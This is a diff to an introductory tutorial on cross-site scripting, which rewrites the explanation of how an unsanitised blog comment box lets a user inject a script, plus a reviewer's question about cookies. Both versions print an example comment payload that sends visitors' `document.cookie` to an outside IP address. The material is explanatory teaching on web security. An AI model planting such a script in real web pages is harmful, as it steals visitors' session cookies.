contents/security/crossSiteScripting/crossSiteScripting.md

```diff
@@ -10,62 +10,77 @@
 
-However, are commenters limited to just typing in plain text? Some websites do not
-check the input, thus commenters are able to use formatting HTML tags, such
+## How does XSS work?
+One of the most common ways to accept inputs from users are text boxes. In this example, we will look at a website that allows users to enter their comments to blog posts. 
+
+Here is the comments section of the website: 
+
+> **Comments Section** <br>
+That's a very nice picture! <br>
+Good photograph!
+
+However, are users limited to just typing in text? This website does not check the input, thus users are able to use formatting HTML tags, such
 as `<b>` for bolding and `<i>` for italicizing.
 
+What happens when a user submits the following as a comment?
 ```html
-I <b>like</b> your blog post!
+I <b>like</b> your photograph!
 ```
 
-becomes: I **like** your blog post!
+It becomes: 
+> **Comments Section** <br>
+That's a very nice picture! <br>
+Good photograph! <br>
+I **like** your photograph!
 
-The problem arises when the commenter starts using HTML for malicious purposes. For
-example, HTML also supports `<script>`, for you to write JavaScript code on the
-webpage as well.
+HTML also supports `<script>`, for you to write JavaScript code on the webpage as well. 
 
+*In HTML, anything between `<script>` and `</script>` will be run as `JavaScript`.*
+
+What happens when a malicious user submits the following as a comment?
 ```html
 This is an innocent looking comment. <script>sendToServer("http://139.241.0.3/", document.cookie)</script>
 ```
 
-While visitors of the blog will only see the non-script portion of the
-comments (i.e. `This is an innocent looking comment.`), the browser will not
-show the script portion of the comment, because it is legal HTML (you won't see
-the tags like `<b>` and `<i>` when viewing webpages, so you definitely won't see
-`<script>` on the webpage).
+It becomes: 
+> **Comments Section** <br>
+That's a very nice picture! <br>
+Good photograph! <br>
+I **like** your photograph! <br>
+This is an innocent looking comment.
 
-However, the browser is **actually executing the script**, without the visitor even being aware of what's going on.
+Visitors of the blog will only see the non-script portion of the comment. The script portion is rendered as `Javascript` just like how the `<b>` and `<i>` tags causes text to be **bolded** and *italicised* but the tags themselves are not shown. 
 
-This means that any malicious users (i.e. hackers) can write a script on their comments, such that everyone that visits the website will have the script executed. The script can be malicious in nature (in our example, the script sends the cookie of the visitor to the hacker).
+The script `<script>sendToServer("http://139.241.0.3/", document.cookie)</script>` will be run immediately when the visitors load the website. Here, the visitor will be unaware that his cookie is stolen. 
```

Comment:
What is a cookie? This term isn't explained anywhere earlier and it isn't clear that it is important in any way.